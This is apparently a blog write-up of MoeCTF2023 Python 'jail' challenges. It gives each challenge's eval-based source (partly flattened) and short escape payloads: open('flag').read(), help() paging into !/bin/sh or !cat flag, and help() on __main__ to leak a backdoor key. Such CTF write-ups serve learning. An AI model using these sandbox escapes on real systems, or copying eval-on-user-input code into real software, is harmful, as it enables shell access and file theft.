print("Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.") print("Enter your expression and I will evaluate it for you.") user_input_data = input("> ") print('calc Answer: {}'.format(eval(user_input_data)))
第0关,检测你的nc是否可以正常工作,没有做任何过滤。
我的答案:
1
open('flag').read()
Jail Level 1
1 2 3 4 5 6 7
print("Welcome to the MoeCTF2023 Jail challenge level1.It's time to work on this calc challenge.") print("Enter your expression and I will evaluate it for you.") user_input_data = input("> ") iflen(user_input_data)>12: print("Oh hacker! Bye~") exit(0) print('calc Answer: {}'.format(eval(user_input_data)))
print("Welcome to the MoeCTF2023 Jail challenge level1.It's time to work on this calc challenge.") print("Enter your expression and I will evaluate it for you.") user_input_data = input("> ") iflen(user_input_data)>6: print("Oh hacker! Bye~") exit(0) print('calc Answer: {}'.format(eval(user_input_data)))
这里进一步限制payload长度,那么很明显breakpoint()也没有办法使用了。
这里选择用help(),然后再查询sys
会因为长度过长,解释器会使用more来分页,这个时候再填入
1
!/bin/sh
或者直接
1
!cat flag
Jail Level 3
1 2 3 4 5 6 7 8 9 10 11 12
import re BANLIST = ['breakpoint'] BANLIST_WORDS = '|'.join(f'({WORD})'for WORD in BANLIST) print("Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.") print("Enter your expression and I will evaluate it for you.") user_input_data = input("> ") iflen(user_input_data)>12: print("Oh hacker! Bye~") exit(0) if re.findall(BANLIST_WORDS, user_input_data, re.I): raise Exception('Blacklisted word detected! you are hacker!') print('Answer result: {}'.format(eval(user_input_data)))
fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat" print("Hey Guys,Welcome to the moeleak challenge.Have fun!.") print("| Options: | [V]uln | [B]ackdoor") deffunc_filter(s): not_allowed = set('dbtaaaaaaaaa!') returnany(c in not_allowed for c in s) while(1): challenge_choice = input(">>> ").lower().strip() if challenge_choice == 'v': print("you need to ") code = input("code >> ") if(len(code)>6): print("you're hacker!") exit(0) if func_filter(code): print("Oh hacker! byte~") exit(0) ifnot code.isascii(): print("please use ascii only thanks!") exit(0) print(eval(code)) elif challenge_choice == 'b': print("Please enter the admin key") key = input("key >> ") if(key == fake_key_into_local_but_vailed_key_into_remote): print("Hey Admin,please input your code:") code = input("backdoor> ") print(eval(code)) else: print("You should select valid choice!")
这里再进一步限制,不能包含”dbtaaaaaaaaa!’”当中的任何一个字符且输入长度不超过6
这里使用help(),再查询__main__,也可以显示出变量key的值
ZackMount
This piece of writing is an original article, utilizing theCC BY-NC-SA 4.0Agreement. For complete reproduction, please acknowledge the source as Courtesy ofZackMount's Blog